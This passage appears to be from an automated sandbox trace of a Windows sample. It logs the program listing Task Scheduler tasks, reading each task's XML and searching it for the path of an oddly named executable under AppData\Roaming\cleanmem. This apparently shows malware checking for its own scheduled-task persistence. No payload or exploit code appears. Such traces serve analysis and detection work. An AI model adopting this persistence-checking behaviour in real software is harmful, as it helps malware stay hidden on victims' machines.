\r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.081] IUnknown:Release (This=0x1270b0) returned 0x0 [0139.081] IUnknown:Release (This=0x126f90) returned 0x0 [0139.081] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.082] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.082] IUnknown:Release (This=0x126f90) returned 0x0 [0139.082] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.082] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.083] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.085] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.085] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270b0) returned 0x0 [0139.085] IRegisteredTask:get_Name (in: This=0x1270b0, pName=0x24da80 | out: pName=0x24da80*="MobilityManager") returned 0x0 [0139.085] IRegisteredTask:get_Xml (in: This=0x1270b0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n") returned 0x0 [0139.087] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.088] IUnknown:Release (This=0x1270b0) returned 0x0 [0139.088] IUnknown:Release (This=0x126f90) returned 0x0 [0139.088] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.089] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.089] IUnknown:Release (This=0x126f90) returned 0x0 [0139.089] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.089] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1a, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.089] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.091] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.091] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.091] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="RegIdleBackup") returned 0x0 [0139.091] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n") returned 0x0 [0139.093] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.094] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.094] IUnknown:Release (This=0x126f90) returned 0x0 [0139.094] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.095] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.095] IUnknown:Release (This=0x126f90) returned 0x0 [0139.095] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.095] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.095] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0139.096] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0139.096] IUnknown:Release (This=0x126f50) returned 0x0 [0139.096] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0139.097] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.097] IUnknown:Release (This=0x126f50) returned 0x0 [0139.097] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.097] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.097] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fa0) returned 0x0 [0139.099] IRegisteredTaskCollection:get_Count (in: This=0x126fa0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.099] IRegisteredTaskCollection:get_Item (in: This=0x126fa0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270e0) returned 0x0 [0139.099] IRegisteredTask:get_Name (in: This=0x1270e0, pName=0x24da80 | out: pName=0x24da80*="RemoteAssistanceTask") returned 0x0 [0139.099] IRegisteredTask:get_Xml (in: This=0x1270e0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n") returned 0x0 [0139.102] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.102] IUnknown:Release (This=0x1270e0) returned 0x0 [0139.102] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.102] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fa0) returned 0x0 [0139.103] ITaskFolderCollection:get_Count (in: This=0x126fa0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.103] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.103] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.103] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.103] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.106] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0139.106] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.106] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="WindowsParentalControls") returned 0x0 [0139.106] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n") returned 0x0 [0139.108] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.108] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.108] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.108] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="WindowsParentalControlsMigration") returned 0x0 [0139.108] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n") returned 0x0 [0139.111] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.111] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.111] IUnknown:Release (This=0x126f90) returned 0x0 [0139.111] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.112] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.112] IUnknown:Release (This=0x126f90) returned 0x0 [0139.112] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.112] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.112] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.116] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=4) returned 0x0 [0139.116] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.116] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="AutoWake") returned 0x0 [0139.116] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n") returned 0x0 [0139.118] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.118] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.118] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.118] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="GadgetManager") returned 0x0 [0139.119] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n") returned 0x0 [0139.126] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.127] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.127] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.127] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="SessionAgent") returned 0x0 [0139.127] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n") returned 0x0 [0139.129] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.129] IUnknown:Release (This=0x1270c0) returned 0x0 [0139.129] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0139.130] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="SystemDataProviders") returned 0x0 [0139.130] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n") returned 0x0 [0139.135] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 